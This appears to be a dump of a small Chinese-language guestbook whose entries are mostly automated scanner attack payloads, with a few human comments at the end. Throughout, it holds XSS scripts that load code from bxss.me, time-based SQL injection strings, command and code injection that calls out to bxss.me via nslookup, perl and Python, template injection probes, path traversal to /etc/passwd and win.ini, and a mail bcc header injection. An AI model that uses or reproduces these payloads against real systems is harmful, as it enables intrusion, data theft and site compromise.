訪客說: 1'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/s?u=7171&r=18302-10061&h=18302-c43e9-2&"></script>

訪客說: epnaAeNt')) OR 802=(SELECT 802 FROM PG_SLEEP(15))--

訪客說: echo dzfedc$()\ vcpmew\nz^xyu||a #' &echo dzfedc$()\ vcpmew\nz^xyu||a #|" &echo dzfedc$()\ vcpmew\nz^xyu||a #

訪客說: acx__${98991*97996}__::.x

訪客說: '"()&%<acx><ScRiPt >9gu7(9822)</ScRiPt>

訪客說: IzOOCzr0' OR 79=(SELECT 79 FROM PG_SLEEP(15))--

訪客說: -1)) OR 627=(SELECT 627 FROM PG_SLEEP(15))--

訪客說: 1<% contenteditable onresize=p5VR(9016)>

訪客說: 1

訪客說: <!--

訪客說: '"

訪客說: http://hitxuaxxbdzjx.bxss.me/

訪客說: 1<W8RZEL>NSXSL[!+!]</W8RZEL>

訪客說: 1nAQfL <ScRiPt >DdYw(9523)</ScRiPt>

訪客說: acx{{98991*97996}}xca

訪客說: /xfs.bxss.me

訪客說: -5) OR 131=(SELECT 131 FROM PG_SLEEP(15))--

訪客說: <a HrEF=jaVaScRiPT:>

index.php說: 1

訪客說: <a HrEF=http://xss.bxss.me></a>

訪客說: 1

訪客說: 1}body{acu:Expre/**/SSion(p5VR(9826))}

訪客說: <a HrEF=jaVaScRiPT:>

訪客說: �<img acu onmouseover=DdYw(99781) //�>

訪客說: 1&lt

訪客說: str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitdbwelftytwed315.'+'bxss.me')

'.print(md5(31337)).'說: 1

訪客說: <a HrEF=http://xss.bxss.me></a>

bxss.me/t/xss.html?%00說: 1

訪客說: 1\u003CScRiPt\DdYw(9738)\u003C/sCripT\u003E

訪客說: %31%3C%53%63%52%69%50%74%20%3E%44%64%59%77%289762%29%3C%2F%73%43%72%69%70%54%3E

訪客說: bxss.me/t/xss.html?%00

acx[[${98991*97996}]]xca說: 1

訪客說: HttP://bxss.me/t/xss.html?%00

訪客說: 1

訪客說: 1<img/src=">" onerror=alert(9315)>

訪客說: 1

訪客說: 1

訪客說: 1<img src=//xss.bxss.me/t/dot.gif onload=DdYw(9079)>

訪客說: ${@print(md5(31337))}\

訪客說: ${@print(md5(31337))}

訪客說: 1'"

訪客說: 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

訪客說: "

bxss.me/t/xss.html?%00說: 1

'說: 1

訪客說: 1&lt

訪客說: rT5MO30X')) OR 351=(SELECT 351 FROM PG_SLEEP(15))--

訪客說: dwvsvTn2') OR 527=(SELECT 527 FROM PG_SLEEP(15))--

訪客說: '.gethostbyname(lc('hitzo'.'dmdulxtdd6690.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(76).chr(122).chr(86).'

^(#$!@#$)(()))******說: 1

訪客說: ${@print(md5(31337))}\

訪客說: UdPFA7bf' OR 112=(SELECT 112 FROM PG_SLEEP(15))--

訪客說: 1\u003CScRiPt\p5VR(9016)\u003C/sCripT\u003E

)說: 1

bxss.me說: 1

訪客說: ^(#$!@#$)(()))******

訪客說: !(()&&!|*|*|

訪客&lt說: 1

訪客說: 1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9604></ScRiPt>

訪客說: acu8767<s1﹥s2ʺs3ʹuca8767

訪客說: )

訪客說: ".gethostbyname(lc("hitqe"."kttczanx0bf77.bxss.me."))."A".chr(67).chr(hex("58")).chr(117).chr(89).chr(103).chr(81)."

訪客說: bxss.me

訪客說: 1&n958385=v947904

訪客說: 1<script>DdYw(9385)</script>

訪客說: Http://bxss.me/t/fit.txt

12345'"\'\")說: 1

)說: 1

訪客說: 1<ScRiPt >DdYw(9000)</ScRiPt>

訪客說: acx__${98991*97996}__::.x

訪客說: 19591647

訪客說: 1

訪客說: 12345'"\'\")

訪客說: %31%3C%53%63%52%69%50%74%20%3E%70%35%56%52%289814%29%3C%2F%73%43%72%69%70%54%3E

訪客說: ^(#$!@#$)(()))******

../訪客說: 1

訪客說: 1

訪客說: bxss.me/t/xss.html?%00

訪客說: 1 waitfor delay '0:0:15' --

訪客說: 1

訪客說: -1)

訪客說: 1

訪客說: -1

訪客說: http://bxss.me/t/fit.txt?.jpg

訪客說: to@example.com> bcc:7171.18302-933.18302.c43e9.18584.2@bxss.me

bxss.me說: 1

訪客說: `(nslookup hitxavhnmhlrq334da.bxss.me||perl -e "gethostbyname('hitxavhnmhlrq334da.bxss.me')")`

訪客說: 1

<th:t="${acx}#foreach說: 1

訪客說: umtWzbvt

訪客說: 1

訪客說: '

訪客說: '"()&%<acx><ScRiPt >p5VR(9505)</ScRiPt>

訪客說: if(now()=sysdate(),sleep(15),0)

訪客說: "+response.write(9188982*9079605)+"

<%={{={@{#{${acx}}%>說: 1

訪客說: '+response.write(9188982*9079605)+'

acu9138<s1﹥s2ʺs3ʹuca9138說: 1

訪客說: <th:t="${acx}#foreach

訪客說: -1' OR 2+951-951-1=0+0+0+1 or 'wJKT32U5'='

訪客說: -1' OR 2+696-696-1=0+0+0+1 --

acx{{98991*97996}}xca說: 1

訪客說: -1 OR 2+197-197-1=0+0+0+1

訪客說: -1 OR 2+428-428-1=0+0+0+1 --

訪客說: 1

訪客說: 1

訪客說: 1

acu8279<s1﹥s2ʺs3ʹuca8279說: 1

index.php/.說: 1

訪客說: )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

訪客說: index.php/.

訪客說: http://hitjeenfafmsd.bxss.me/

訪客說: "+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitdbwelftytwed315.'+'bxss.me')+"

訪客說: index.php

訪客說: 1

訪客說: '+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitdbwelftytwed315."+"bxss.me")+'

訪客說: 1

${@print(md5(31337))}\說: 1

'"()說: 1

${@print(md5(31337))}說: 1

"說: 1

'說: 1

訪客說: '.print(md5(31337)).'

訪客說: @@9Z0fc

訪客說: '

訪客說: 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

訪客說: ".gethostbyname(lc("hitjo"."dxojczib3379d.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(88).chr(100).chr(82)."

訪客&n990792=v925030說: 1

!(()&&!|*|*|說: 1

訪客說: '"()

Http://bxss.me/t/fit.txt說: 1

訪客說: &echo loqfyf$()\ pgpzwk\nz^xyu||a #' &echo loqfyf$()\ pgpzwk\nz^xyu||a #|" &echo loqfyf$()\ pgpzwk\nz^xyu||a #

訪客說: -1)) OR 745=(SELECT 745 FROM PG_SLEEP(15))--

訪客說: http://bxss.me/t/fit.txt?.jpg

訪客說: http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

訪客說: -5) OR 587=(SELECT 587 FROM PG_SLEEP(15))--

${9999359+9999685}說: 1

訪客說: 1<esi:include src="http://bxss.me/rpb.png"/>

訪客說: ${10000188+9999992}

訪客說: -5 OR 598=(SELECT 598 FROM PG_SLEEP(15))--

訪客說: JKtzU9JS'

訪客說: ../1

訪客說: ../../../../../../../../../../windows/win.ini

訪客說: ../../../../../../../../../../etc/passwd

訪客說: 1 bcc:7171.18302-932.18302.c43e9.18584.2@bxss.me

2ApXeM1Z說: 1

訪客說: (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

訪客說: echo kfpwjc$()\ lffwat\nz^xyu||a #' &echo kfpwjc$()\ lffwat\nz^xyu||a #|" &echo kfpwjc$()\ lffwat\nz^xyu||a #

訪客說: 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

訪客說: 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

訪客說: 1'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/s?u=7171&r=18302-929&h=18302-c43e9-2&"></script>

訪客說: response.write(9188982*9079605)

訪客說: -1" OR 2+313-313-1=0+0+0+1 --

1xbsrqdrO說: 1

訪客說: 1hmfq5AYO

訪客說: 1

-1 OR 2+675-675-1=0+0+0+1說: 1

<a HrEF=jaVaScRiPT:>說: 1

acx__${98991*97996}__::.x說: 1

acx{{98991*97996}}xca說: 1

訪客說: 1

訪客說: 1

<th:t="${acx}#foreach說: 1

訪客說: 1<img sRc='http://attacker-9165/log.php?

訪客說: 1<WPXDPC>4HHMJ[!+!]</WPXDPC>

訪客說: 1Ksv9Q <ScRiPt >p5VR(9240)</ScRiPt>

訪客說: 1<input autofocus onfocus=p5VR(9089)>

訪客說: �<img acu onmouseover=p5VR(91391) //�>

訪客說: 1<img/src=">" onerror=alert(9629)>

訪客說: 1<img src=xyz OnErRor=p5VR(9956)>

訪客說: 1<img src=//xss.bxss.me/t/dot.gif onload=p5VR(9859)>

訪客說: 1<body onload=p5VR(9636)>

訪客說: 1<isindex type=image src=1 onerror=p5VR(9345)>

訪客說: 1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9675></ScRiPt>

訪客說: 1<ScRiPt >p5VR(9694)</ScRiPt>

訪客說: 1<script>p5VR(9774)</script>

訪客說: 1<ScRiPt >p5VR(9917)</ScRiPt>

訪客說: acx[[${98991*97996}]]xca

訪客說: 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

訪客說: 1

@@7HdUn說: 1

1'"說: 1

訪客說: <th:t="${acx}#foreach

訪客說: <%={{={@{#{${acx}}%>

訪客說: acux10649��z1��z2a�bcxuca10649

ieBot4rn'說: 1

Http://bxss.me/t/fit.txt說: 1

訪客說: bxss.me

-1 OR 2+862-862-1=0+0+0+1說: 1

訪客說: 1

index.php說: 1

訪客說: index.php/.

訪客說: 1'"()&%<acx><ScRiPt >p5VR(9337)</ScRiPt>

'"說: 1

訪客說: 1'"

訪客說: <!--

/xfs.bxss.me說: 1

訪客說: 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

訪客說: WJ8wV1yD') OR 704=(SELECT 704 FROM PG_SLEEP(15))--

訪客說: )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

訪客說: '+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitvqtvtgnmiue4736."+"bxss.me")+'

'.print(md5(31337)).'說: 1

${@print(md5(31337))}\說: 1

訪客說: -5 OR 193=(SELECT 193 FROM PG_SLEEP(15))--

訪客說: Byne6ENP'

訪客&n950004=v940947說: 1

${@print(md5(31337))}說: 1

"說: 1

訪客說: '.print(md5(31337)).'

^(#$!@#$)(()))******說: 1

!(()&&!|*|*|說: 1

訪客說: response.write(9312040*9163619)

訪客說: ${@print(md5(31337))}

訪客說: "

訪客說: 1 waitfor delay '0:0:15' --

訪客說: !(()&&!|*|*|

訪客說: HttP://bxss.me/t/xss.html?%00

'"()說: 1

訪客說: str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitvqtvtgnmiue4736.'+'bxss.me')

訪客說: Http://bxss.me/t/fit.txt

訪客說: (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

訪客說: '"()

訪客說: 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

${9999947+9999726}說: 1

訪客說: )

訪客說: 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

訪客說: ${10000121+9999843}

訪客說: if(now()=sysdate(),sleep(15),0)

訪客說: 1<esi:include src="http://bxss.me/rpb.png"/>

訪客說: 1

bXsIV94Q說: 1

訪客說: ../../../../../../../../../../windows/win.ini

訪客說: 0gssgo9S

訪客說: 1 bcc:7171.18302-10063.18302.c43e9.18584.2@bxss.me

訪客說: (nslookup hitbpgidldfina5c38.bxss.me||perl -e "gethostbyname('hitbpgidldfina5c38.bxss.me')")

訪客說: ../../../../../../../../../../etc/passwd

訪客說: -1' OR 2+30-30-1=0+0+0+1 or 'Q6FvuFmE'='

訪客說: -1' OR 2+378-378-1=0+0+0+1 --

訪客說: &echo davipy$()\ lpohup\nz^xyu||a #' &echo davipy$()\ lpohup\nz^xyu||a #|" &echo davipy$()\ lpohup\nz^xyu||a #

訪客說: -1 OR 2+703-703-1=0+0+0+1

訪客說: -1 OR 2+896-896-1=0+0+0+1 --

訪客說: 1

訪客說: 1

訪客說: 1<ifRAme sRc=9220.com></IfRamE>

訪客說: 1<% contenteditable onresize=DdYw(9609)>

訪客說: 1}body{acu:Expre/**/SSion(DdYw(9638))}

訪客<6r43Ga<說: 1

訪客說: 1<input autofocus onfocus=DdYw(9443)>

訪客<4zZNRI<說: 1

訪客<biKFhX x=9236>說: 1

訪客<GLnp03 x=9749>說: 1

訪客說: 1<img src=xyz OnErRor=DdYw(9642)>

<a HrEF=jaVaScRiPT:>說: 1

訪客說: 1<body onload=DdYw(9766)>

<a HrEF=jaVaScRiPT:>說: 1

訪客說: 1<iframe src='data:text/html

訪客說: 1<isindex type=image src=1 onerror=DdYw(9982)>

訪客&lt說: 1

訪客說: 1<ScRiPt >DdYw(9685)</ScRiPt>

訪客說: 1<ScR<ScRiPt>IpT>DdYw(9490)</sCr<ScRiPt>IpT>

訪客說: 1<W55OGQ>MH4EW[!+!]</W55OGQ>

訪客說: acx[[${98991*97996}]]xca

acx__${98991*97996}__::.x說: 1

訪客說: acx{{98991*97996}}xca

acx[[${98991*97996}]]xca說: 1

acx{{98991*97996}}xca說: 1

訪客說: 1

訪客說: 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

acx__${98991*97996}__::.x說: 1

訪客說: 1

<%={{={@{#{${acx}}%>說: 1

acx[[${98991*97996}]]xca說: 1

訪客說: 1

訪客9470913說: 1

訪客說: <%={{={@{#{${acx}}%>

訪客說: 1<nFcx0r<

<th:t="${acx}#foreach說: 1

訪客說: 1<img sRc='http://attacker-9926/log.php?

<%={{={@{#{${acx}}%>說: 1

訪客說: 1<WSCGXT>8UDVF[!+!]</WSCGXT>

訪客說: 1DVSiB <ScRiPt >9gu7(9790)</ScRiPt>

訪客說: <a HrEF=jaVaScRiPT:>

訪客說: acux6212��z1��z2a�bcxuca6212

訪客說: <a HrEF=http://xss.bxss.me></a>

訪客9003163說: 1

訪客說: 1<input autofocus onfocus=9gu7(9515)>

訪客說: 1&lt

訪客說: 19899151

訪客說: 1'"()&%<acx><ScRiPt >DdYw(9881)</ScRiPt>

訪客說: 1<img/src=">" onerror=alert(9167)>

訪客說: 1<img src=xyz OnErRor=9gu7(9622)>

訪客說: 1<img src=//xss.bxss.me/t/dot.gif onload=9gu7(9020)>

訪客說: 1<iframe src='data:text/html

訪客說: 1<isindex type=image src=1 onerror=9gu7(9766)>

訪客說: 1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9457></ScRiPt>

訪客說: 1<ScR<ScRiPt>IpT>9gu7(9053)</sCr<ScRiPt>IpT>

訪客說: 1<WFNDEV>PZBPN[!+!]</WFNDEV>

訪客說: 1<ScRiPt >9gu7(9820)</ScRiPt>

訪客說: acx[[${98991*97996}]]xca

訪客說: acx{{98991*97996}}xca

訪客說: 1

訪客說: 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

訪客說: 1

訪客說: <th:t="${acx}#foreach

訪客說: <%={{={@{#{${acx}}%>

訪客說: acux7024��z1��z2a�bcxuca7024

訪客說: acu8966<s1﹥s2ʺs3ʹuca8966

訪客說: 19369322

訪客說: 1

訪客說: 1

@@UMIge說: 1

1'"說: 1

<!--說: 1

訪客說: $(nslookup hitoncaapbdjtd90f0.bxss.me||perl -e "gethostbyname('hitoncaapbdjtd90f0.bxss.me')")

eW4o0Mhj'說: 1

'"說: 1

訪客說: (nslookup hitvgpcdmbfly3f7e1.bxss.me||perl -e "gethostbyname('hitvgpcdmbfly3f7e1.bxss.me')")

訪客說: |echo imcftz$()\ gpzons\nz^xyu||a #' |echo imcftz$()\ gpzons\nz^xyu||a #|" |echo imcftz$()\ gpzons\nz^xyu||a #

訪客說: 1'"()&%<acx><ScRiPt >9gu7(9118)</ScRiPt>

/xfs.bxss.me說: 1

訪客說: so cool

訪客說: 0

訪客說: !@#$

訪客說: 123

訪客說: 123

這應該是個漏洞說: 名字可以從開發者工具改

訪客說: 我也要嘗試做一個

訪客說: 成功了吧!!!

訪客說: 你好!

jamie說: 小小bbs

jamie說: yes